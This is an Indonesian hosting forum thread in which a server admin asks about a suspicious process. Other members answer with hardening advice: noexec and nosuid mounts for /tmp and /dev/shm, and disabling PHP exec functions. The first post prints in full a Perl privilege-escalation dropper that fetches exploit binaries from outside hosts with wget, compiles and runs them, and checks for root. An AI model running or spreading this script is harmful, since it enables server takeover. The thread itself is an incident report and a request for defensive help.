[Ask] Ini Apaan Ya Master? Please Help (Turkish Hacker)

Discussion in 'Masalah Teknik dan Keamanan' started by remajahost, 31 Jul 2011.

Thread Status:
Not open for further replies.
  1. remajahost

    remajahost Poster 2.0

    Messages:
    124
    Likes Received:
    5
    Trophy Points:
    18
    Barusan saya menemukan sesuatu yang aneh pada proses Server saya.
    Saya menemukan proses seperti gambar dibawah ini:
    [​IMG]
    Setelah saya coba akses URL yang berada di Proses tersebut "http://www.nbvk.nl/w/10.txt"
    Hasilnya:
    Code:
    #!/usr/bin/perl 
    # Exploit tools v2.0 coded by iskorpitx (Turkish Hacker)
    # linux serverlerde gecerlidir
    # iyi sanslar:)
    # by iskorpitx
    { 
    system("wget www.nbvk.nl/w/15704.c"); 
    system("gcc 15704.c -o 1704");
    system("chmod 777 1704"); 
    system("./1704"); 
    system("id"); 
    system("wget www.nbvk.nl/w/15704");  
    system("chmod 777 15704"); 
    system("./15704"); 
    system("id"); 
    system("wget www.nbvk.nl/w/iskorpitx");  
    system("chmod 777 iskorpitx"); 
    system("./iskorpitx"); 
    system("id"); 
    print "If u r r00t stop xpl with ctrl+c\n";
    system("wget www.nbvk.nl/w/44");  
    system("chmod 777 44"); 
    system("./44"); 
    system("id"); 
    system("wget www.nbvk.nl/w/exp1");  
    system("chmod 777 exp1"); 
    system("./exp1"); 
    system("id"); 
    print "If u r r00t stop xpl with ctrl+c\n";
    system("wget www.nbvk.nl/w/exp2");  
    system("chmod 777 exp2"); 
    system("./exp2"); 
    system("id");  
    system("wget www.nbvk.nl/w/run2");  
    system("chmod 777 run2"); 
    system("./run2"); 
    system("id");  
    print "If u r r00t stop xpl with ctrl+c\n"; 
    system("wget www.nbvk.nl/w/15285.c"); 
    system("gcc 15285.c -o 15285");
    system("chmod 777 15285"); 
    system("./15285"); 
    system("id"); 
    print "If u r r00t stop xpl with ctrl+c\n"; 
    system("wget www.nbvk.nl/w/15"); 
    system("chmod 777 15"); 
    system("./15"); 
    system("id"); 
    print "If u r r00t stop xpl with ctrl+c\n"; 
    system("wget www.nbvk.nl/w/27"); 
    system("chmod 777 27"); 
    system("./27"); 
    system("id"); 
    system("wget www.nbvk.nl/27-1"); 
    system("chmod 777 27-1"); 
    system("./27-1"); 
    system("id"); 
    system("http://www.solarenergy.com.bd/templates/beez/15150"); 
    system("chmod 777 15150"); 
    system("./15150 0xc0102290 64"); 
    system("id"); 
    system("wget www.nbvk.nl/w/siy");
    system("chmod 777 siy");
    system("./siy");
    system("id");
    system("wget www.nbvk.nl/w/15620.sh");
    system("chmod 777 15620.sh");
    system("./15620.sh");
    system("id");
    }
    
    Seketika juga saya langsung Suspended akun yang bersangkutan.
    Bisa berikan penjelasan para master2 semua? Apakah ada kaitannya dengan mencoba menembus sistem keamanan server?
     
  2. cpserv

    cpserv Expert 1.0

    Messages:
    866
    Likes Received:
    123
    Trophy Points:
    43
  3. remajahost

    remajahost Poster 2.0

    Messages:
    124
    Likes Received:
    5
    Trophy Points:
    18
  4. cpserv

    cpserv Expert 1.0

    Messages:
    866
    Likes Received:
    123
    Trophy Points:
    43
    /dev/shm tu cm shared memory doank. biar proses bisa lebih cepet. tapi bahaya klo ada client (asumsi dpt akses console) yg iseng/nakal.

    kebanyakan script2 berbahaya tu dijalanin di /dev/shm sama /tmp jadi itu harus yg harus diamanin. dengan ada flag nosuid,noexec di mounting point harusnya script itu ga bisa jalan.

    mudah2an bisa cepet sembuh ya servernya. :D
     
  5. remajahost

    remajahost Poster 2.0

    Messages:
    124
    Likes Received:
    5
    Trophy Points:
    18
    Hm... mengerti sekarang.
    Tetapi tutor di http://sysadmingear.blogspot.com/2007/10/how-to-secure-tmp-and-devshm-partition.html bisa di jalankan di keduanya kan kang (Dedi/VPS)
    Dan sekarang apakah saya harus menjalankan command yg berada di tutor? *Maaf nie pengen pastikan aja, takutnya salah malah kacau :(
     
  6. cpserv

    cpserv Expert 1.0

    Messages:
    866
    Likes Received:
    123
    Trophy Points:
    43
    gpp koq itu.. klo tadi jawabannya VPS saya mau nanya lagi,, OpenVZ bukan? klo OpenVZ beda lagi cara nanganinnya.. tapi berhubung bilangnya dedicated ya ga jadi.. :p

    tapi pastiin dulu itu scriptnya udah bersih (silahkan pake script apaan aja yg bisa buat ngecek bagian mana aja yg "terinfeksi")

    yg jelas nosuid,noexec,rw itu harus ada di /dev/shm sama /tmp



    edit: gausah dijalanin dari awal.. cukup masukin nosuid,noexec,rw di dalem /etc/fstab bagian /dev/shm sama /tmp

    abis itu mount -o remount /tmp ; mount -o remount /dev/shm
     
  7. remajahost

    remajahost Poster 2.0

    Messages:
    124
    Likes Received:
    5
    Trophy Points:
    18
    woke kang...
    akan di coba :)
     
  8. perdhanahost

    perdhanahost Expert 1.0

    Messages:
    986
    Likes Received:
    147
    Trophy Points:
    43
    Nambah aja sedikit.

    Sama dengan 'exec' atau 'shell_exec', fungsi function 'system' adalah execute command di CLI. Sebaiknya didisable saja. Selain 'exec', 'shell_exec', dan 'system' disable juga 'passthru', 'parse_ini_file', 'proc_open' dan 'show_source'.

    Semoga bermanfaat.
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...